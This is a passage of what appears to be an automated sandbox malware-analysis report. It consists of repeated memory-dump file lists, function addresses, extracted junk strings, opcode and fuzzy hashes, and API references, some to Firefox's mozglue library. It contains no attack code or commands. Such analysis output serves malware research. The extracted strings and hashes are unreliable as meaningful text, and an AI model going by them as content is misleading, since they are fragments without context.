Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 3d27bce89cee907b04ccda828e35310769ca95f4b46ea2e98f8215bd82d06573
Instruction ID: 0afd0633c289d44d62702df216057e2bc5aff5d9c5f2472102c563e5682ea506
Opcode Fuzzy Hash: 3d27bce89cee907b04ccda828e35310769ca95f4b46ea2e98f8215bd82d06573
Instruction Fuzzy Hash: 00416DB594421ADBDB10DFA0DD89FEEB7B8BB48704F1041A8F509AA280D7746A84CF91

Function 0046BEF5 Relevance: 12.9, Strings: 9, Instructions: 1652COMMON

Download Yara Rule

Strings

=4o_, xrefs: 0046CF98
"/Vj, xrefs: 0046CCD1
5DoO, xrefs: 0046C93F
R8;u, xrefs: 0046C0A2
R8;u, xrefs: 0046C0AD
QF|, xrefs: 0046D08C
fh{, xrefs: 0046C844
'bm[, xrefs: 0046C2E2
2m, xrefs: 0046D2A1

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "/Vj$'bm[$2m$5DoO$=4o_$QF|$R8;u$R8;u$fh{
API String ID: 0-3703538509
Opcode ID: bdc66f7f6da4cd3f43ed5e42a609f514ee07f2efc7d1ac0fca62c453a39de5b7
Instruction ID: 11750fdfac8e6e2214c56ffe43fea6c237db652f2ba408e44a953cd0c893f90f
Opcode Fuzzy Hash: bdc66f7f6da4cd3f43ed5e42a609f514ee07f2efc7d1ac0fca62c453a39de5b7
Instruction Fuzzy Hash: 97B227F3A0C2049FE304AE2DEC8567ABBE9EF94720F16453DEAC4C7744E63598058697

Function 00481898 Relevance: 12.8, Strings: 9, Instructions: 1560COMMON

Download Yara Rule

Strings

g6w, xrefs: 00481D88
N}d, xrefs: 004823DC
mku, xrefs: 00482A6F
C2}}, xrefs: 004828A4
]T{o, xrefs: 00482AE9
@\_;, xrefs: 00481AEA
YLw], xrefs: 004819E7
gzLg, xrefs: 00482AA0
g6w, xrefs: 00481D73

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: g6w$ g6w$@\_;$C2}}$YLw]$]T{o$gzLg$mku$N}d
API String ID: 0-726739713
Opcode ID: 82f905e31e914fdf579569d54de50728b85fb284b7904231a1504906cfb93747
Instruction ID: bfaa4ea5194bd5b6531034cb7645c975beb655d1a80dc1a36761dc0dd1d6a629
Opcode Fuzzy Hash: 82f905e31e914fdf579569d54de50728b85fb284b7904231a1504906cfb93747
Instruction Fuzzy Hash: E4B2E6F3608200AFE7046E2DEC4567ABBE9EF94720F1A492DE6C5C3744EA3598118797

Function 0047FE01 Relevance: 12.8, Strings: 9, Instructions: 1538COMMON

Download Yara Rule

Strings

J~s, xrefs: 004804CA
gO?, xrefs: 0048055E
,^, xrefs: 0047FFCC
<vq, xrefs: 00480037
u\8, xrefs: 00480B2C
7*^=, xrefs: 00480FD2
!aW[, xrefs: 0048033F
Ve, xrefs: 004803D8
1zo^, xrefs: 0048023C

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !aW[$1zo^$7*^=$Ve$gO?$u\8$,^$<vq$J~s
API String ID: 0-1093286744
Opcode ID: 83eeef493e8755a4b3062281815cf7f82d2e4e87901bd6381ffc556ddfb779e5
Instruction ID: d7cbf37cf0e0928f197c2158ac7c1098de929bc252369a5a00b663af81f4a3b4
Opcode Fuzzy Hash: 83eeef493e8755a4b3062281815cf7f82d2e4e87901bd6381ffc556ddfb779e5
Instruction Fuzzy Hash: 7DA2F3F360C2049FE304AE2DEC8566AFBE9EF94720F16493DE6C4C7744EA3598058697

Function 6C6A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6A2C61

Part of subcall function 6C654DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
Part of subcall function 6C654DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6A2E2D

Part of subcall function 6C6681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6681DE

Strings

(root), xrefs: 6C6A354F
ProfileBuffer parse error: %s, xrefs: 6C6A2E3B
expected a Time entry, xrefs: 6C6A2E36

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction ID: c45b159c50666698707fa0529ec4367b72d96f9d0c3f7e5a65ee094248517380
Opcode Fuzzy Hash: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction Fuzzy Hash: 4191CF706087408FC724DF65C48469EF7E1AFCA358F10492DE99A8B751DB30E94ACB5B

Function 0046DA9F Relevance: 11.6, Strings: 8, Instructions: 1625COMMON

Download Yara Rule

Strings

sJl, xrefs: 0046DE93
K}, xrefs: 0046E446
<[i4, xrefs: 0046E0A2
aSl*, xrefs: 0046EA63
@icW, xrefs: 0046E607
E)_N, xrefs: 0046E9FF
V~}, xrefs: 0046DD90
rJl, xrefs: 0046DE8E

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: K}$<[i4$@icW$E)_N$aSl*$rJl$sJl$V~}
API String ID: 0-1987938060
Opcode ID: d132c9e8d123c3db3a57d12cbf5b62095d9a02f93cbaf8fa5d2aab23b219a179
Instruction ID: 35e6ab5d1be12968c15eac08203d460f7e6b206c5c3da443a872b9e285ade40a
Opcode Fuzzy Hash: d132c9e8d123c3db3a57d12cbf5b62095d9a02f93cbaf8fa5d2aab23b219a179
Instruction Fuzzy Hash: FEB205F360C6049FE704AE2DEC8577AB7E9EB94320F164A3DEAC5C3344EA3558058697

Function 00472B44 Relevance: 11.6, Strings: 8, Instructions: 1584COMMON

Download Yara Rule

Strings

ly, xrefs: 00472CFD
eG;q, xrefs: 004739EB
l/g, xrefs: 00472CA9
:V?_, xrefs: 00473E30
Wd__, xrefs: 00473279
h?O, xrefs: 00473E6E
:>]7, xrefs: 00473710
"zV, xrefs: 00473CD1

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "zV$:>]7$:V?_$Wd__$eG;q$l/g$h?O$ly
API String ID: 0-999392736
Opcode ID: ec3fd77b021f378436d6db1a9f31897fbac808bcccc5d21f85f987e8c06e028a
Instruction ID: 34e8d106d47c834ace93a46d2f877e2505192afa4d98f260beacbc1f139bd555
Opcode Fuzzy Hash: ec3fd77b021f378436d6db1a9f31897fbac808bcccc5d21f85f987e8c06e028a
Instruction Fuzzy Hash: 6DB2C1F360C200AFE304AE29EC8567AFBE9EF94720F1A493DE6C4C3744E67558458696

Function 6C65D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 6C65DC7F
-, xrefs: 6C65D7DD
9, xrefs: 6C65DE7F
, xrefs: 6C65DA88
1, xrefs: 6C65DBDD
@, xrefs: 6C65DAF6
0, xrefs: 6C65D852
8, xrefs: 6C65DC08

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction ID: 0aa39ac45e123d66a3a14887cae5e2a87215a2a65c9adc49dc6c57d26949dd6f
Opcode Fuzzy Hash: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction Fuzzy Hash: A262CF7060C3458FD701CF19C69079ABBF2AF86358FB84A0DE4D54BAD1C33599A5CB8A

Function 6C6C545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C8A4B

Strings

~qel, xrefs: 6C6C5703, 6C6C9269, 6C6C9459, 6C6C56C7, 6C6C921F, 6C6C5740, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01af520261224d43aa745bc0de72f0653f0550fdd9b9ffcc5ee0159283b6d2d5
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0BB1F772F0021A8FDB24CF68CC907E9B7B2EF85318F1802AAC549DB791D7349985CB95

Function 6C6C542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6C925C

Strings

~qel, xrefs: 6C6C5703, 6C6C9269, 6C6C9459, 6C6C56C7, 6C6C921F, 6C6C5740, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 847e3582a78b901618d98ce7101b713317aa8019d6372db2b3185b55660006ee
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: ABB1E572F0420A8BCB14CE58CC816EDB7B2EF85314F14426AC949DB795D734A989CB95

Function 0047E44C Relevance: 9.1, Strings: 6, Instructions: 1559COMMON

Download Yara Rule

Strings

l??o, xrefs: 0047EDB1
}M, xrefs: 0047EBF9
'u}_, xrefs: 0047F370
Jfh, xrefs: 0047EB40
ps}, xrefs: 0047F1A8
f{{, xrefs: 0047F276

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
